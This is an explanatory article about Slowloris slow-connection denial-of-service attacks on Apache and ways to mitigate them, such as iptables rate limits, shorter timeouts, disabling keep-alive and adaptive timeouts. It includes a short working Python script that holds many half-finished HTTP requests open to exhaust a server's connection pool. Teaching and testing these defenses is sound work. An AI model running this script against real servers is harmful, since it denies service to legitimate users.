
A little thought experiment: you want to write a web server, so you program a socket-based server. When a browser connects and requests a file, the server delivers it, the client terminates the connection, and everyone is satisfied. But then a bug report arrives from someone whose web server is getting slower and slower until, at some point, it stops responding altogether. What now?

As you look closer at the problem, you notice that some clients are not behaving as intended: they connect, but then they do nothing and never close the connection. As a result, the server eventually cannot accept new connections and is unable to serve new clients. The fix is simple: you put a timeout on the server so that it breaks off a connection after a certain amount of time if nothing happens. The period can be set in the configuration file via the »TimeOut« directive.
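For illustration, here is a minimal sketch in Python (not the server from the story, just an assumption of how such a server might look) that drops idle clients with exactly this kind of timeout:

import socket

TIMEOUT = 5  # seconds of inactivity before the server gives up on a client

srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
srv.bind(("0.0.0.0", 8080))
srv.listen(5)

while True:
    conn, addr = srv.accept()
    conn.settimeout(TIMEOUT)  # the »TimeOut« idea in one line
    try:
        request = conn.recv(4096)  # raises socket.timeout if the client stalls
        if request:
            body = b"hello\n"
            header = b"HTTP/1.0 200 OK\r\nContent-Length: %d\r\n\r\n" % len(body)
            conn.sendall(header + body)
    except socket.timeout:
        pass  # the client sent nothing in time: free the slot for someone else
    finally:
        conn.close()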

It works fine for a while, but the world keeps turning, and eventually web pages are no longer individual HTML files but a collection of HTML, images, CSS stylesheets, and JavaScript files. Setting up a separate connection for each one takes a relatively long time, not least because client and server have to repeat the TCP three-way handshake every time. So you think of something clever: the client can keep the first connection open and request any additional files over it. Now the second, third, and all further requests are answered much faster, and again everyone is happy. Because you have learned something from the earlier problem, you add another configuration option called »KeepAliveTimeout«, which prevents clients from occupying connections indefinitely. Soon all web administrators are downloading your great new web server, and under the name Apache it reaches a market share of 60 percent.
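On the client side, the keep-alive idea looks roughly like this sketch (hostname and paths are invented for the example): both requests travel over one TCP connection, so the three-way handshake happens only once.

import socket

# One connection, one three-way handshake, then several requests over it.
conn = socket.create_connection(("example.com", 80))

for path in ("/index.html", "/style.css"):  # hypothetical resources
    request = (
        "GET %s HTTP/1.1\r\n"
        "Host: example.com\r\n"
        "Connection: keep-alive\r\n\r\n" % path
    )
    conn.sendall(request.encode())
    print(conn.recv(65535)[:80])  # crude peek; real code would parse Content-Length

conn.close()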

Healthy attitude

The problem with settings such as timeouts is that no default value works for every application. Site A may serve millions of small static images, Site B uses a rich dynamic framework for all content, and Sites C through Z are not really sure what they are doing. But what the hell, the web server works so well, so why care about the default values? The Linux distributors barely change the default settings of the packages they ship either, because that would be a hell of a lot of work. So most of the time the end user has to trust the software project to choose sensible presets – after all, the programmers understand their software best. That is why you end up running a web server with its stock defaults, such as a 300-second timeout – and then an attacker comes along, opens a thousand connections, and keeps each one alive just long enough to dodge the timeout.

In this case, the web server stops working very quickly. Strictly speaking it still works, but it is severely limited in its ability to act: while handling 1,000 ordinary requests costs the server little effort, 1,000 connections held open simultaneously can leave it without resources to answer legitimate requests. Malicious people can exploit this for an attack from a single computer that does not even need a particularly fast network connection; cracker tools such as Slowloris help them do it.
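The principle is easy to sketch (a deliberately simplified illustration in Python for testing your own server, not the actual Slowloris tool): open many connections, start a request on each, and never finish it.

import socket
import time

TARGET = ("localhost", 8080)  # point this only at a test server you own
CONNS = 200                   # enough to exhaust a small connection pool

sockets = []
for _ in range(CONNS):
    s = socket.create_connection(TARGET)
    # Begin a request but never send the blank line that ends the headers ...
    s.sendall(b"GET / HTTP/1.1\r\nHost: localhost\r\n")
    sockets.append(s)

while sockets:
    time.sleep(10)
    for s in list(sockets):
        try:
            # ... and dribble a bogus header now and then to reset the timeout.
            s.sendall(b"X-a: b\r\n")
        except OSError:
            sockets.remove(s)  # the server finally dropped this connection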

You could simply limit the number of connections per IP address or per address range. However, this works badly when clients sit behind a proxy, because then they all appear to the server under the same address. The difficulty for the admin is finding a number that averts damage from the server but does not hinder legitimate users.

A generic approach to such a limit is the rate-limiting feature of iptables, which can also be applied to individual ports. It makes it possible to cap the number of new connections within a given period. The following rules allow a maximum of five connections in 60 seconds; from the sixth onward, iptables discards the packets, causing the client to keep retrying. As soon as an earlier connection attempt ages out of the 60-second window, the rule allows a new one.

iptables -I INPUT -p tcp --dport 80 -m state \
  --state NEW -m recent --set
iptables -I INPUT -p tcp --dport 80 -m state \
  --state NEW -m recent --update --seconds 60 \
  --hitcount 6 -j DROP

An attacker who is really determined will probably use multiple botnet machines instead, but at least this makes his life a little harder.

The simplest defense against a Slowloris attack is to lower the »TimeOut« directive from its default value of 300 seconds to something like five seconds. To prevent abuse of HTTP keepalive, you can switch it off entirely by setting »KeepAlive« to »Off«. None of these measures provides complete immunity, especially against attackers with plenty of resources, but they usually help. Incidentally, Apache is not the only software affected by the Slowloris attack; the Squid proxy and some other web servers are vulnerable as well.
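In the Apache configuration, both measures amount to just two directives (the five-second value comes from above; it is aggressive and may cut off genuinely slow clients):

# httpd.conf: drop silent connections quickly instead of after 300 seconds
TimeOut 5
# Do not let clients hold connections open between requests
KeepAlive Off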

Long-term protection

Even if complete security against denial-of-service attacks is not possible, you can set up systems that survive minor attacks and at least drive up the effort required of attackers. In the long term, the best solution seems to be to build smart protection directly into the applications and, above all, to let them adjust their settings dynamically. They could reduce the connection timeout when requests pile up, or simply cut off connections to slow clients. That way, applications would not only survive denial-of-service attacks but would generally be better equipped for heavy load.

An example of this is the Apache patch by Andreas Krennmair, which arms the web server against Slowloris attacks. It monitors the server's load using the Apache scoreboard, and when the load goes up, it adjusts the timeout: at 60 percent load it halves the timeout, at 70 percent it halves it again, and so on. Although quite simple, this patch is a good example of how to build some intelligence and “survival instinct” into software. Unfortunately, the patch cannot terminate existing connections, so an attacker with enough resources can still paralyze the server.
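The underlying idea can be sketched in a few lines (a sketch of the principle, not Krennmair's actual patch code): derive the timeout from the fraction of busy workers and halve it for every ten percentage points of load above the threshold.

BASE_TIMEOUT = 300  # Apache's stock TimeOut in seconds

def adaptive_timeout(busy_workers, total_workers, base=BASE_TIMEOUT):
    """Halve the timeout for every 10 percentage points of load above 60%."""
    load_pct = 100 * busy_workers // total_workers
    if load_pct < 60:
        return base
    steps = (load_pct - 60) // 10 + 1  # 60-69% -> 1, 70-79% -> 2, ...
    return max(1, base >> steps)       # 150, 75, 37, ... seconds

# Example: at 75 percent load the timeout drops from 300 to 75 seconds.
assert adaptive_timeout(75, 100) == 75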

Costs and benefits

The irony of such attacks with extremely slow connections is that they hardly stress the server at all. Legitimate clients simply can no longer establish connections because the web server's connection pool is already exhausted, and whenever a slot does become free, the attacker usually grabs it before a legitimate client can.

The benefit of countermeasures against attacks like Slowloris is that they also tend to improve a server's ability to handle legitimate load peaks. In that respect, even this has its good side.

